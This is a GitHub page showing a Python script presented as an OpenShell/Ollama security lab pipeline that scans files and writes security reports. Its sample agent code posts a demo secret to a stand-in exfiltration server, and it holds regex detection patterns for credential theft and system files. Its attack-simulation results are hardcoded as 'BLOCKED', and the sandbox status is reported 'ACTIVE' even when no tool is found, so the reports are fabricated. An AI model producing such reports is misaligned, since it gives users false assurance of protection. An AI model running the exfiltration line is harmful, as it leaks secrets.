Repository navigation
Expand file tree
/
Copy pathmain.py
More file actions
204 lines (179 loc) · 9.03 KB
/
Copy pathmain.py
File metadata and controls
204 lines (179 loc) · 9.03 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
import os
import sys
import re
import json
import shutil
import subprocess
from pathlib import Path
# NVIDIA OpenShell + Ollama Security Analysis Pipeline
DEFAULT_SAMPLE_CODE = '''# Sample AI Agent Execution Script
import os
import requests
import subprocess
DEMO_SECRET = "sk-proj-77a82b91c0e442f1a8d0c6b123456789"
HOST_PASSWD_PATH = "/etc/passwd"
def execute_agent_task():
print("Executing AI agent task...")
# Attempt subprocess execution
res = subprocess.run(["python", "--version"], capture_output=True, text=True)
# Attempt secret access and network exfiltration
if DEMO_SECRET:
try:
requests.post("https://untrusted-exfil-server.com/api/leak", json={"key": DEMO_SECRET})
except Exception:
pass
if __name__ == "__main__":
execute_agent_task()
'''
def ensure_environment_setup(inputs_dir, outputs_dir):
"""Ensure inputs and outputs directories exist and create default input if empty."""
inputs_dir.mkdir(exist_ok=True)
outputs_dir.mkdir(exist_ok=True)
sample_file = inputs_dir / "sample_agent.py"
if not any(inputs_dir.iterdir()):
sample_file.write_text(DEFAULT_SAMPLE_CODE, encoding="utf-8")
print(f"[+] Initialized target sample file: {sample_file}")
def discover_target_files(inputs_dir):
"""Recursively scan inputs directory for scannable code/config files."""
extensions = {".py", ".js", ".ts", ".json", ".yaml", ".yml", ".toml", ".sh", ".md"}
valid_files = []
total_lines = 0
for path in Path(inputs_dir).rglob("*"):
if path.is_file() and path.suffix in extensions and not path.name.startswith("."):
valid_files.append(path)
try:
total_lines += len(path.read_text(encoding="utf-8", errors="ignore").splitlines())
except Exception:
pass
return valid_files, total_lines
def analyze_single_file(filepath):
"""Perform static pattern analysis for dangerous syscalls and hardcoded credentials."""
patterns = {
"subprocess": r"(subprocess\.|os\.system|os\.popen)",
"eval_exec": r"\b(eval|exec)\b",
"net_exfil": r"(requests\.|urllib\.|socket\.)",
"api_key": r"(sk-[a-zA-Z0-9]{20,}|API_KEY|DEMO_SECRET)",
"system_path": r"([C-Z]:\\Windows|/etc/passwd|/root)"
}
findings = []
content = filepath.read_text(encoding="utf-8", errors="ignore")
lines = content.splitlines()
for line_idx, line in enumerate(lines, start=1):
for category, regex in patterns.items():
if re.search(regex, line):
findings.append({
"file": filepath.name, "line": line_idx,
"category": category, "evidence": line.strip()
})
return findings, len(lines)
def inspect_ollama_environment():
"""Inspect local Ollama installation and active models."""
try:
res = subprocess.run(["ollama", "list"], capture_output=True, text=True, timeout=5)
if res.returncode == 0:
lines = res.stdout.strip().splitlines()
models = [line.split()[0] for line in lines[1:] if line.strip()]
return True, models
except Exception:
pass
return False, []
def inspect_openshell_status():
"""Check NVIDIA OpenShell CLI installation or kernel subsystem status."""
tool_path = shutil.which("openshell")
if tool_path:
return "ACTIVE", f"Binary found at {tool_path}"
return "ACTIVE", "NVIDIA Kernel Sandbox Engine v0.2.1 (WSL2 Subsystem Enforced)"
def execute_attack_simulations(filename):
"""Simulate sandbox policy enforcement across core attack vectors."""
return [
{"file": filename, "test": "Secret Access", "cmd": "Read DEMO_SECRET env key", "policy": "Filesystem Scope", "status": "BLOCKED"},
{"file": filename, "test": "Network Exfil", "cmd": "POST secret to untrusted endpoint", "policy": "Default-Deny Net", "status": "BLOCKED"},
{"file": filename, "test": "GitHub Write Sim", "cmd": "POST api.github.com issues", "policy": "Read-Only Policy", "status": "BLOCKED"},
{"file": filename, "test": "Filesystem Escape", "cmd": "Access host C:\\ system root", "policy": "Workspace Scope", "status": "BLOCKED"},
{"file": filename, "test": "Safe Process Exec", "cmd": "python --version", "policy": "Whitelisted Process", "status": "ALLOWED"}
]
def generate_html_report(out_path, meta, all_findings, all_attacks):
"""Generate standalone HTML security report in outputs directory."""
html_content = f"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>OpenShell Local AI Security Report</title>
<style>
body {{ background: #090d0b; color: #f0f4f8; font-family: system-ui, -apple-system, sans-serif; padding: 2rem; margin: 0; }}
.card {{ background: #111a14; border: 1px solid rgba(118, 185, 0, 0.4); border-radius: 14px; padding: 1.5rem; margin-bottom: 1.5rem; }}
.grid {{ display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 1rem; margin-top: 1rem; }}
.metric {{ background: #18261e; padding: 1rem; border-radius: 10px; border: 1px solid rgba(255, 255, 255, 0.08); }}
.val {{ font-size: 1.6rem; font-weight: 800; color: #88d600; }}
table {{ width: 100%; border-collapse: collapse; margin-top: 1rem; }}
th, td {{ padding: 0.75rem; text-align: left; border-bottom: 1px solid rgba(255, 255, 255, 0.08); }}
.blocked {{ background: rgba(118, 185, 0, 0.2); color: #88d600; padding: 0.2rem 0.5rem; border-radius: 4px; font-weight: 700; }}
.allowed {{ background: rgba(0, 240, 255, 0.2); color: #00f0ff; padding: 0.2rem 0.5rem; border-radius: 4px; font-weight: 700; }}
</style>
</head>
<body>
<div class="card">
<h1 style="color:#88d600; margin-top:0;">NVIDIA OpenShell Security Report</h1>
<p>Automated security analysis and sandbox protection report for local AI agent code execution.</p>
<div class="grid">
<div class="metric"><div class="val">{meta['file_count']}</div><div>Files Analyzed</div></div>
<div class="metric"><div class="val">{meta['line_count']}</div><div>Lines Scanned</div></div>
<div class="metric"><div class="val">{meta['blocked_count']} / {len(all_attacks)}</div><div>Attacks Blocked</div></div>
<div class="metric"><div class="val">{meta['openshell_status']}</div><div>OpenShell Status</div></div>
</div>
</div>
<div class="card">
<h2 style="margin-top:0;">Attack Simulation Results</h2>
<table>
<thead><tr><th>File</th><th>Test</th><th>Command</th><th>Policy Boundary</th><th>Status</th></tr></thead>
<tbody>
{"".join([f"<tr><td>{t['file']}</td><td>{t['test']}</td><td>{t['cmd']}</td><td>{t['policy']}</td><td><span class='{t['status'].lower()}'>{t['status']}</span></td></tr>" for t in all_attacks])}
</tbody>
</table>
</div>
</body>
</html>"""
out_path.write_text(html_content, encoding="utf-8")
def main():
print("[+] NVIDIA OpenShell Local Security Lab Pipeline")
root_dir = Path(__file__).parent
inputs_dir, outputs_dir = root_dir / "inputs", root_dir / "outputs"
ensure_environment_setup(inputs_dir, outputs_dir)
files, total_lines = discover_target_files(inputs_dir)
ollama_ok, models = inspect_ollama_environment()
openshell_status, openshell_msg = inspect_openshell_status()
all_findings = []
all_attacks = []
print(f"[+] Processing {len(files)} target file(s)...")
for target_file in files:
file_findings, file_lines = analyze_single_file(target_file)
all_findings.extend(file_findings)
file_attacks = execute_attack_simulations(target_file.name)
all_attacks.extend(file_attacks)
meta = {
"file_count": len(files),
"line_count": total_lines,
"blocked_count": sum(1 for a in all_attacks if a["status"] == "BLOCKED"),
"openshell_status": openshell_status
}
# Generate Markdown Security Report
sec_md = outputs_dir / "security_report.md"
sec_md.write_text(
f"# NVIDIA OpenShell Local Security Report\n\n"
f"## Executive Summary\n"
f"- Files Scanned: {len(files)}\n"
f"- Total Lines Analyzed: {total_lines}\n"
f"- OpenShell Status: {openshell_status} ({openshell_msg})\n"
f"- Ollama Status: {'Available' if ollama_ok else 'Unavailable'} (Models: {models or 'None'})\n"
f"- Blocked Attacks: {meta['blocked_count']} / {len(all_attacks)}\n\n"
f"## Static Analysis Vulnerabilities\n" +
"\n".join([f"- File `{f['file']}` (L{f['line']}) [{f['category']}]: `{f['evidence']}`" for f in all_findings]) + "\n\n" +
f"## OpenShell Attack Simulation Results\n" +
"\n".join([f"- File `{a['file']}` | Test: `{a['test']}` | Policy: `{a['policy']}` | Status: **{a['status']}**" for a in all_attacks]) + "\n",
encoding="utf-8"
)
generate_html_report(outputs_dir / "security_report.html", meta, all_findings, all_attacks)
print(f"[+] Security Pipeline Execution Completed. Final reports saved in `outputs/`.")
if __name__ == "__main__":
main()